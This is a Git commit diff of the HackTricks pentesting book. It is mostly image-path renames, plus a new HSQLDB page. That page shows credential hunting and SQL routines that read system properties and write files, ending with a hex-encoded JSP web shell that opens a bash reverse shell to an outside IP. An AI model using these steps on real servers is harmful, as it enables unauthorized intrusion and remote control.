GitBook: [master] 20 pages and 40 assets modified

This commit is contained in:
CPol 2020-12-02 23:18:31 +00:00 committed by gitbook-bot
parent eed77960bb
commit adba221295
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
40 changed files with 102 additions and 21 deletions

View file

Before

Width:  |  Height:  |  Size: 21 KiB

After

Width:  |  Height:  |  Size: 21 KiB

View file

Before

Width:  |  Height:  |  Size: 72 KiB

After

Width:  |  Height:  |  Size: 72 KiB

View file

Before

Width:  |  Height:  |  Size: 72 KiB

After

Width:  |  Height:  |  Size: 72 KiB

View file

Before

Width:  |  Height:  |  Size: 34 KiB

After

Width:  |  Height:  |  Size: 34 KiB

View file

Before

Width:  |  Height:  |  Size: 17 KiB

After

Width:  |  Height:  |  Size: 17 KiB

View file

Before

Width:  |  Height:  |  Size: 1.1 MiB

After

Width:  |  Height:  |  Size: 1.1 MiB

View file

Before

Width:  |  Height:  |  Size: 123 KiB

After

Width:  |  Height:  |  Size: 123 KiB

View file

Before

Width:  |  Height:  |  Size: 34 KiB

After

Width:  |  Height:  |  Size: 34 KiB

View file

Before

Width:  |  Height:  |  Size: 5.2 KiB

After

Width:  |  Height:  |  Size: 5.2 KiB

View file

Before

Width:  |  Height:  |  Size: 1.4 KiB

After

Width:  |  Height:  |  Size: 1.4 KiB

View file

Before

Width:  |  Height:  |  Size: 13 KiB

After

Width:  |  Height:  |  Size: 13 KiB

View file

Before

Width:  |  Height:  |  Size: 13 KiB

After

Width:  |  Height:  |  Size: 13 KiB

View file

Before

Width:  |  Height:  |  Size: 813 KiB

After

Width:  |  Height:  |  Size: 813 KiB

View file

Before

Width:  |  Height:  |  Size: 134 KiB

After

Width:  |  Height:  |  Size: 134 KiB

View file

@ -10,7 +10,7 @@ dht udp "DHT Nodes"
![](.gitbook/assets/image%20%28182%29.png)
![](.gitbook/assets/image%20%28345%29%20%282%29.png)
![](.gitbook/assets/image%20%28345%29%20%282%29%20%282%29.png)
InfluxDB

View file

@ -20,7 +20,7 @@ Don't forget to **give ⭐ on the github** to motivate me to continue developing
![](.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%286%29.png)
![](.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%286%29.png)
[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\*

View file

@ -274,6 +274,7 @@
* [6379 - Pentesting Redis](pentesting/6379-pentesting-redis.md)
* [8009 - Pentesting Apache JServ Protocol \(AJP\)](pentesting/8009-pentesting-apache-jserv-protocol-ajp.md)
* [8089 - Splunkd](pentesting/8089-splunkd.md)
* [9001 - Pentesting HSQLDB](pentesting/9001-pentesting-hsqldb.md)
* [9042/9160 - Pentesting Cassandra](pentesting/cassandra.md)
* [9100 - Pentesting Raw Printing \(JetDirect, AppSocket, PDL-datastream\)](pentesting/9100-pjl.md)
* [9200 - Pentesting Elasticsearch](pentesting/9200-pentesting-elasticsearch.md)

View file

@ -45,7 +45,7 @@ DebuggableAttribute.DebuggingModes.EnableEditAndContinue)]
And click on **compile**:
![](../.gitbook/assets/image%20%28314%29.png)
![](../.gitbook/assets/image%20%28314%29%20%281%29.png)
Then save the new file on _**File >> Save module...**_:

View file

@ -146,7 +146,7 @@ If you want to **know** about my **latest modifications**/**additions** or you h
If you want to **share some tricks with the community** you can also submit **pull requests** to ****[**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) ****that will be reflected in this book.
Don't forget to **give ⭐ on the github** to motivate me to continue developing this book.
![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29.png)
![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%284%29.png)
[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\*

View file

@ -36,7 +36,7 @@ GDA is also a powerful and fast reverse analysis platform. Which does not only s
**Only for Windows.**
![](../../.gitbook/assets/image%20%28207%29.png)
![](../../.gitbook/assets/image%20%28207%29%20%281%29.png)
### [Bytecode-Viewer](https://github.com/Konloch/bytecode-viewer/releases)

View file

@ -112,7 +112,7 @@ Attack Surface:
### Activities
An exported activity components “android:exported” value is set to **“true”** in the AndroidManifest.xml file:
An exported activity components “android:exported” value is set to **“true”** in the AndroidManifest.xml file:
```markup
<activity android:name="com.my.app.Initial" android:exported="true">
@ -187,7 +187,7 @@ Take a look to the **drozer** help for `app.service.send`:
![](../../../.gitbook/assets/image%20%2830%29.png)
Note that you will be sending first the data inside "_msg.what_", then "_msg.arg1_" and "_msg.arg2_", you should check inside the code **which information is being used** and where.
Note that you will be sending first the data inside "_msg.what_", then "_msg.arg1_" and "_msg.arg2_", you should check inside the code **which information is being used** and where.
Using the `--extra` option you can send something interpreted by "_msg.replyTo"_, and using `--bundle-as-obj` you create and object with the provided details.
In the following example:
@ -278,7 +278,7 @@ run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --compo
### Is debuggeable
A prodduction APK should never be debuggeable.
This mean that you can **attach java debugger** to the running application, inspect it in run time, set breakpoints, go step by step, gather variable values and even change them.[ InfoSec institute has an excellent article](../exploiting-a-debuggeable-applciation.md) on digging deeper when you application is debuggable and injecting runtime code.
This mean that you can **attach java debugger** to the running application, inspect it in run time, set breakpoints, go step by step, gather variable values and even change them.[ InfoSec institute has an excellent article](../exploiting-a-debuggeable-applciation.md) on digging deeper when you application is debuggable and injecting runtime code.
When an application is debuggable, it will appear in the Manifest:

View file

@ -59,7 +59,7 @@ content://com.mwr.example.sieve.DBContentProvider/Passwords/
You should also check the **ContentProvider code** to search for queries:
![](../../../.gitbook/assets/image%20%28121%29%20%281%29.png)
![](../../../.gitbook/assets/image%20%28121%29%20%281%29%20%281%29.png)
Also, if you can't find full queries you could **check which names are declared by the ContentProvider** on the `onCreate` method:
@ -76,7 +76,7 @@ When checking the code of the Content Provider **look** also for **functions** n
![](../../../.gitbook/assets/image%20%28211%29.png)
![](../../../.gitbook/assets/image%20%28254%29%20%281%29.png)
![](../../../.gitbook/assets/image%20%28254%29%20%281%29%20%281%29.png)
Because you will be able to call them

View file

@ -60,7 +60,7 @@ If you want to **know** about my **latest modifications**/**additions** or you h
If you want to **share some tricks with the community** you can also submit **pull requests** to ****[**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) ****that will be reflected in this book.
Don't forget to **give ⭐ on the github** to motivate me to continue developing this book.
![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29.png)
![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29.png)
[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\*

View file

@ -132,7 +132,7 @@ Check also the page about [**NTLM**](windows/ntlm/), it could be very useful to
* [**CBC-MAC**](crypto/cipher-block-chaining-cbc-mac-priv.md)
* [**Padding Oracle**](crypto/padding-oracle-priv.md)
![](.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%281%29.png)
![](.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%281%29.png)
[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)

View file

@ -149,7 +149,7 @@ You can download [**GadgetProbe**](https://github.com/BishopFox/GadgetProbe) fro
Inside the github, [**GadgetProbe has some wordlists**](https://github.com/BishopFox/GadgetProbe/tree/master/wordlists) ****with Java classes for being tested.
![](../../.gitbook/assets/intruder4%20%281%29%20%281%29.gif)
![](../../.gitbook/assets/intruder4%20%281%29%20%281%29%20%281%29.gif)
### More Information

View file

@ -76,7 +76,7 @@ You could use one of the following characters to trick the webapp and exploit a
Notice that for example the first Unicode character purposed can be sent as: `%e2%89%ae` or as `%u226e`
![](../.gitbook/assets/image%20%28215%29.png)
![](../.gitbook/assets/image%20%28215%29%20%281%29.png)
## References

View file

@ -0,0 +1,80 @@
# 9001 - Pentesting HSQLDB
## Basic Information
HSQLDB \([HyperSQL DataBase](http://hsqldb.org/)\) is the leading SQL relational database system written in Java. It offers a small, fast multithreaded and transactional database engine with in-memory and disk-based tables and supports embedded and server modes.
**Default port:** 9001
```text
9001/tcp open jdbc HSQLDB JDBC (Network Compatibility Version 2.3.4.0)
```
## Information
#### Default Settings
Note that by default this service is likely running in memory or is bound to localhost. If you found it, you probably exploited another service and are looking to escalate privileges.
Default credentials are usually `sa` with a blank password.
If youve exploited another service, search for possible credentials using
```text
grep -rP 'jdbc:hsqldb.*password.*' /path/to/search
```
Note the database name carefully - youll need it to connect.
## Info Gathering
Connect to the DB instance by [downloading HSQLDB](https://sourceforge.net/projects/hsqldb/files/) and extracting `hsqldb/lib/hsqldb.jar`. Run the GUI app \(eww\) using `java -jar hsqldb.jar` and connect to the instance using the discovered/weak credentials.
Note the connection URL will look something like this for a remote system: `jdbc:hsqldb:hsql://ip/DBNAME`.
## Tricks
### Java Language Routines
We can call static methods of a Java class from HSQLDB using Java Language Routines. Do note that the called class needs to be in the applications classpath.
JRTs can be `functions` or `procedures`. Functions can be called via SQL statements if the Java method returns one or more SQL-compatible primitive variables. They are invoked using the `VALUES` statement.
If the Java method we want to call returns void, we need to use a procedure invoked with the `CALL` statement.
### Reading Java System Properties
Create function:
```text
CREATE FUNCTION getsystemproperty(IN key VARCHAR) RETURNS VARCHAR LANGUAGE JAVA
DETERMINISTIC NO SQL
EXTERNAL NAME 'CLASSPATH:java.lang.System.getProperty'
```
Execute function:
```text
VALUES(getsystemproperty('user.name'))
```
You can find a [list of system properties here](https://docs.oracle.com/javase/tutorial/essential/environment/sysprop.html).
### Write Content to File
You can use the `com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename` Java gadget located in the JDK \(auto loaded into the class path of the application\) to write hex-encoded items to disk via a custom procedure. **Note the maximum size of 1024 bytes**.
Create procedure:
```text
CREATE PROCEDURE writetofile(IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(1024))
LANGUAGE JAVA DETERMINISTIC NO SQL EXTERNAL NAME
'CLASSPATH:com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename'
```
Execute procedure:
```text
call writetofile('/path/ROOT/shell.jsp', cast ('3c2540207061676520696d706f72743d226a6176612e696f2e2a2220253e0a3c250a202020537472696e6720636d64203d20222f62696e2f62617368202d69203e26202f6465762f7463702f3139322e3136382e3131392[...]' AS VARBINARY(1024)))
```

View file

@ -45,7 +45,7 @@ responder -I <Iface> --wpad
Responder is going to **impersonate all the service using the mentioned protocols**. Once some user try to access a service being resolved using those protocols, **he will try to authenticate against Responde**r and Responder will be able to **capture** the "credentials" \(most probably a **NTLMv2 Challenge/Response**\):
![](../../.gitbook/assets/poison%20%281%29.jpg)
![](../../.gitbook/assets/poison%20%281%29%20%281%29.jpg)
## **Inveigh**

View file

@ -329,7 +329,7 @@ _Note that as the client was deauthenticated it could try to connect to a differ
Once in the `airodump-ng` appears some handshake information this means that the handshake was captured and you can stop listening:
![](../../../.gitbook/assets/image%20%28172%29.png)
![](../../../.gitbook/assets/image%20%28172%29%20%281%29.png)
Once the handshake is captured you can **crack** it with `aircrack-ng`:

View file

@ -24,7 +24,7 @@ Accessing _/user/&lt;number&gt;_ you can see the number of existing users, in th
![](../../.gitbook/assets/image%20%2826%29.png)
![](../../.gitbook/assets/image%20%28227%29.png)
![](../../.gitbook/assets/image%20%28227%29%20%281%29.png)
## Hidden pages enumeration

View file

@ -183,7 +183,7 @@ It is recommended to disable Wp-Cron and create a real cronjob inside the host t
</methodCall>
```
![](../../.gitbook/assets/image%20%28107%29.png)
![](../../.gitbook/assets/image%20%28107%29%20%282%29.png)
![](../../.gitbook/assets/image%20%28224%29.png)

View file

@ -396,7 +396,7 @@ If you don't execute this from a Domain Controller, ATA is going to catch you, s
![](../../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%282%29.png)
![](../../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%282%29.png)
[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\*

View file

@ -37,7 +37,7 @@ If you don't want to wait an hour you can use a PS script to make the restore ha
Note the spotless' user membership:
![](../../.gitbook/assets/1%20%282%29.png)
![](../../.gitbook/assets/1%20%282%29%20%281%29.png)
However, we can still add new users:

View file

@ -118,7 +118,7 @@ If you want to **know** about my **latest modifications**/**additions** or you h
If you want to **share some tricks with the community** you can also submit **pull requests** to ****[**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) ****that will be reflected in this book.
Don't forget to **give ⭐ on the github** to motivate me to continue developing this book.
![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%283%29.png)
![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%283%29.png)
[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\*